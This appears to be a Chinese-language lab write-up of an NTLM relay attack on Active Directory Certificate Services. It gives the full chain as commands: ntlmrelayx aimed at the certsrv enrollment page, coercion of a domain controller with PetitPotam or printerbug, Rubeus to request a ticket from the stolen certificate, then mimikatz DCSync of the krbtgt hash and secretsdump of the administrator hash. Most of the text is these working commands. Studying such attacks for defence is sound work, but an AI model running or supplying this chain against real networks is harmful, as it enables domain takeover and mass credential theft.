ADCS证书服务攻击

ADCS证书服务攻击

前言：关于NTLM Relay：你所不知道的NTLM Rela

由于ADCS的http证书接口没有启用NTLM中继保护，因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证，因此Kerberos协议无法使用。因此，攻击者可以利用NTLM Relay攻击ADCS证书服务。

关于搭建ADCS证书服务：配置启用基于SSL的LDAP(LDAPS)

http://10.211.55.4/certsrv/certfnsh.asp

01

漏洞复现

定位证书服务器机器

certutil -config - -ping

ntlmrelayx监听，这里需要新的impacket：https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

python3 ntlmrelayx.py -t http://10.211.55.4/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

使用脚本触发辅助域控回连我们的攻击机器，这里可以使用最新的Petitpotam.py，也可以使用printerbug.py 。详情：利用PetitPotam进行NTLM Relay攻击

python3 Petitpotam.py -d xie.com -u hack -p P@ss1234 10.211.55.2 10.211.55.5

#或者使用printerbug.py也可以触发

python3 printerbug.py xie/hack@10.211.55.5 10.211.55.2

或

获取到base64编码的证书数据，会打印出很多个base64编码的证书，我们随便选择一个即可。

然后使用Rubeus导入证书数据

Rubeus.exe asktgt /user:AD02$ /certificate:打印出来的base64的证书数据 /ptt

然后使用mimikatz即可导出域内任意用户哈希

mimikatz.exe

#查看kerberos票据

kerberos::list

#导出krbtgt用户的hash

lsadump::dcsync /user:krbtgt /csv

或者可以手动导入证书

kerberos::ptt ticket.kirbi

也可以使用kekeo将.kirbi后缀的证书转换为 .ccache后缀的证书，然后使用impacket工具进行利用。

misc::convert ccache ticket.kirbi

export KRB5CCNAME=AD02\$\@XIE.COM_krbtgt~xie.com\@XIE.COM.ccaches

proxychains4 -q python3 secretsdump.py -k -no-pass AD01.xie.com -just-dc-user administrator